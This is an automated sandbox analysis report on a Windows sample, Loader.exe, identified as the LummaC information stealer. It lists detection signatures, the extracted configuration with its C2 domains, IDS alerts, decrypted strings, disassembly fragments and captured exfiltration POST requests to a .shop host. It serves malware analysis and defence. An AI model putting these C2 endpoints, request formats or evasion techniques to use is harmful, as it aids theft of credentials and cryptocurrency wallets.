Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1582076
MD5:005896360be304a48e43d98bda83e12a
SHA1:305eb0232f73c8902427645b386810ec0efbb182
SHA256:169e2c86cc3b4953c7a52029f656bdac7fbe5207c7711c7640e312c0d2d62a0b
Tags:exeuser-JaffaCakes118
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 005896360BE304A48E43D98BDA83E12A)
    • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 7888 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 005896360BE304A48E43D98BDA83E12A)
    • WerFault.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 136 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "abruptyopsn.shop", "fancywaxxers.shop", "rabidcowse.shop", "noisycuttej.shop", "framekgirus.shop"], "Build id": "BVnUqo--@youngesstt"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Loader.exe PID: 7888JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-29T23:37:01.191785+010020283713Unknown Traffic192.168.2.450006104.21.80.1443TCP
            2024-12-29T23:37:02.210145+010020283713Unknown Traffic192.168.2.450007104.21.80.1443TCP
            2024-12-29T23:37:04.143444+010020283713Unknown Traffic192.168.2.450011104.21.80.1443TCP
            2024-12-29T23:37:05.699139+010020283713Unknown Traffic192.168.2.450012104.21.80.1443TCP
            2024-12-29T23:37:06.916870+010020283713Unknown Traffic192.168.2.450013104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-29T23:37:01.685688+010020546531A Network Trojan was detected192.168.2.450006104.21.80.1443TCP
            2024-12-29T23:37:03.001796+010020546531A Network Trojan was detected192.168.2.450007104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-29T23:37:01.685688+010020498361A Network Trojan was detected192.168.2.450006104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-29T23:37:03.001796+010020498121A Network Trojan was detected192.168.2.450007104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-29T23:37:05.112215+010020480941Malware Command and Control Activity Detected192.168.2.450011104.21.80.1443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: fancywaxxers.shopAvira URL Cloud: Label: malware
            Source: https://fancywaxxers.shop/apiAvira URL Cloud: Label: malware
            Source: https://fancywaxxers.shop/apimAvira URL Cloud: Label: malware
            Source: rabidcowse.shopAvira URL Cloud: Label: malware
            Source: noisycuttej.shopAvira URL Cloud: Label: malware
            Source: wholersorie.shopAvira URL Cloud: Label: malware
            Source: nearycrepso.shopAvira URL Cloud: Label: malware
            Source: cloudewahsj.shopAvira URL Cloud: Label: malware
            Source: https://fancywaxxers.shop:443/api4p.default-release/key4.dbPKAvira URL Cloud: Label: malware
            Source: https://fancywaxxers.shop/apitdAvira URL Cloud: Label: malware
            Source: framekgirus.shopAvira URL Cloud: Label: malware
            Source: https://fancywaxxers.shop/Avira URL Cloud: Label: malware
            Source: abruptyopsn.shopAvira URL Cloud: Label: malware
            Source: tirepublicerj.shopAvira URL Cloud: Label: malware
            Source: 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "abruptyopsn.shop", "fancywaxxers.shop", "rabidcowse.shop", "noisycuttej.shop", "framekgirus.shop"], "Build id": "BVnUqo--@youngesstt"}
            Source: Loader.exeReversingLabs: Detection: 34%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.1% probability
            Source: Loader.exeJoe Sandbox ML: detected
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fancywaxxers.shop
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: BVnUqo--@youngesstt
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00417F6B CryptUnprotectData,6_2_00417F6B
            Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50006 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50007 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50011 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50012 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50013 version: TLS 1.2
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002C81D8 FindFirstFileExW,0_2_002C81D8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002C8289 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_002C8289
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002C81D8 FindFirstFileExW,6_2_002C81D8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002C8289 FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_002C8289
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+0Ch]6_2_00437120
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [004480B0h]6_2_0040C2D9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 385488F2h6_2_0043C499
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+14h]6_2_0040BB4E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], dx6_2_00418D53
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx6_2_00417F6B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx6_2_00416040
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax6_2_0041C066
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al6_2_0041C07E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax6_2_0041C061
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax6_2_0041BCF8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]6_2_004022C0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax+69E06B08h]6_2_004222D9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl6_2_004222D9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl6_2_004222D9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl6_2_004222D9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, dword ptr [ebp-18h]6_2_004222D9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebp+00h], al6_2_0041E2F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi+2Ah]6_2_0041E2F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00BC092Ch]6_2_0043E2F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add eax, eax6_2_004082A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2BCA296Dh]6_2_0042C2BA
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx6_2_004152B8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+3CA787A0h]6_2_0043C36F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h6_2_0041A300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h6_2_0041A300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h6_2_0041A300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx6_2_0041A300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h6_2_0041A300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h6_2_0041A300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h6_2_0041A300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h6_2_0041A300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-2FE804DEh]6_2_0042739B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]6_2_00407400
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]6_2_00407400
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+10h]6_2_0043C40A
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h6_2_00415415
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h6_2_00415415
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl6_2_0042C4DC
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al6_2_0042C4DC
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al6_2_0041C5DE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl6_2_0042C59E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al6_2_0042C59E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], cl6_2_0042C642
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al6_2_0042C642
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ecx], al6_2_0041C653
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_00429610
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esi+08h], eax6_2_00419612
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax6_2_00424690
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, word ptr [ecx]6_2_00424690
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, word ptr [ecx]6_2_00424690
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]6_2_0043B760
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [ebp+0Ch]6_2_00417778
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+35E89369h]6_2_00409720
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx6_2_00428725
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, ecx6_2_00428725
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [ebp+esi+02h], 0000h6_2_004207B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx6_2_00428824
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp dword ptr [0044478Ch]6_2_0041682D
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax6_2_004058A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, eax6_2_004058A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx6_2_004218B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]6_2_00434940
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebx], cl6_2_0042A960
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then dec ebx6_2_00426921
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, esi6_2_0041CA4D
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx6_2_0041CA4D
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx6_2_0041BA54
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+2BCA2901h]6_2_00437A6B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+30h]6_2_00428A10
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [ebp+0Ch]6_2_00417778
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 385488F2h6_2_0043CB75
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h6_2_00429BC0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax6_2_0042ABC8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 385488F2h6_2_0043CB73
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]6_2_00421BE0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax6_2_0042AB83
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 385488F2h6_2_0043CB80
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]6_2_00402BA0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax6_2_0042AB36
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax6_2_0041BCF8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, eax6_2_00426DB3
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]6_2_00425E30
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al6_2_0041BEBE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl6_2_0042AF49
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al6_2_0042AF49
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebp+543E9DE5h]6_2_00408FE0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h6_2_0043AF80
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl6_2_0042AF8C
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al6_2_0042AF8C

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50011 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50006 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50006 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50007 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50007 -> 104.21.80.1:443
            Source: Malware configuration extractorURLs: cloudewahsj.shop
            Source: Malware configuration extractorURLs: wholersorie.shop
            Source: Malware configuration extractorURLs: nearycrepso.shop
            Source: Malware configuration extractorURLs: tirepublicerj.shop
            Source: Malware configuration extractorURLs: abruptyopsn.shop
            Source: Malware configuration extractorURLs: fancywaxxers.shop
            Source: Malware configuration extractorURLs: rabidcowse.shop
            Source: Malware configuration extractorURLs: noisycuttej.shop
            Source: Malware configuration extractorURLs: framekgirus.shop
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50006 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50011 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50012 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50013 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50007 -> 104.21.80.1:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: fancywaxxers.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7NHRP02K4MXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18127Host: fancywaxxers.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VTH0YMONO0BECKZELUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8784Host: fancywaxxers.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
            Source: Loader.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Loader.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: Loader.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: Loader.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: Loader.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Loader.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: Loader.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Loader.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: Loader.exeString found in binary or memory: http://ocsp.digicert.com0
            Source: Loader.exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: Loader.exeString found in binary or memory: http://ocsp.entrust.net02
            Source: Loader.exeString found in binary or memory: http://ocsp.entrust.net03
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Loader.exeString found in binary or memory: http://www.digicert.com/CPS0
            Source: Loader.exeString found in binary or memory: http://www.entrust.net/rpa03
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Loader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: Loader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
